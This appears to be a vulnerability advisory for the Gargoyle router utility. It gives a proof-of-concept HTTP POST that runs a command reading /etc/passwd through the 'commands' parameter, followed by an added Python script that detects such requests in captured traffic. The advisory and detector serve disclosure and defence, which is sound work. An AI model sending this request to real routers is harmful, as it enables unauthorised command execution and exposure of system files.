# Affected software: Gargoyle router management utility
# Type of vulnerability: code execution
# URL: http://www.gargoyle-router.com/
# Discovered by: provensec
# Website: provensec.com
# Version: 1.5.X (Built 20140215-1506 git@505e8dc)

# Proof of concept

vulnerable parameter = "commands"

POST /utility/run_commands.sh HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/time.sh
Cookie: browser_time=1433405406; hash=090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64; exp=1433406276
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=--------108192589
Content-Length: 418

----------108192589
Content-Disposition: form-data; name="commands"

*cat/etc/passwd*
----------108192589
Content-Disposition: form-data; name="hash"

090AB022C1B989478946468B2409B9FEF0916F2440A342AA07907CFA77B40C64
----------108192589--

## screenshot for output: http://prntscr.com/7ckcqd

And yes, it requires authentication.
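For reviewing captured traffic or proxy logs, the following added example (not part of the original advisory and not Gargoyle project code) flags POST requests to /utility/run_commands.sh that carry the "commands" field and reports the submitted value. It goes slightly beyond the request shown above by also decoding urlencoded bodies. The function names, the placeholder hash and the benign sample command are assumptions made for illustration.

```python
from email.parser import BytesParser
from email.policy import HTTP
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/utility/run_commands.sh"  # path taken from the advisory's request
FIELD = "commands"                     # parameter the advisory names as vulnerable

def form_fields(content_type, body):
    """Decode a multipart/form-data or urlencoded body into {name: value}."""
    if content_type.lower().startswith("multipart/form-data"):
        # Prepend the Content-Type header so the MIME parser can find the boundary.
        msg = BytesParser(policy=HTTP).parsebytes(
            b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
        return {p.get_param("name", header="content-disposition"):
                (p.get_payload(decode=True) or b"").decode("utf-8", "replace").strip()
                for p in msg.iter_parts()}
    return {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}

def audit_request(raw):
    """Return a finding if raw is a POST to ENDPOINT that carries FIELD, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, _, header_block = head.partition(b"\r\n")
    parts = request_line.decode("latin-1").split()
    if len(parts) != 3 or parts[0] != "POST" or urlsplit(parts[1]).path != ENDPOINT:
        return None
    headers = BytesParser(policy=HTTP).parsebytes(header_block, headersonly=True)
    fields = form_fields(str(headers.get("Content-Type", "")), body)
    if FIELD not in fields:
        return None
    return {"host": str(headers.get("Host", "")), "command": fields[FIELD],
            "has_hash_cookie": "hash=" in str(headers.get("Cookie", ""))}

# Constructed sample modelled on the advisory's request: placeholder hash, benign command.
BOUNDARY = "--------108192589"
SAMPLE = ("POST /utility/run_commands.sh HTTP/1.1\r\n"
          "Host: 192.168.1.1\r\n"
          "Cookie: hash=PLACEHOLDER; exp=0\r\n"
          f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
          f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"commands\"\r\n\r\n"
          "uptime\r\n"
          f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"hash\"\r\n\r\n"
          "PLACEHOLDER\r\n"
          f"--{BOUNDARY}--\r\n").encode()

if __name__ == "__main__":
    print(audit_request(SAMPLE))
```

Each finding records the target host, the command text and whether a hash cookie accompanied the request, which matches the advisory's note that the request is authenticated.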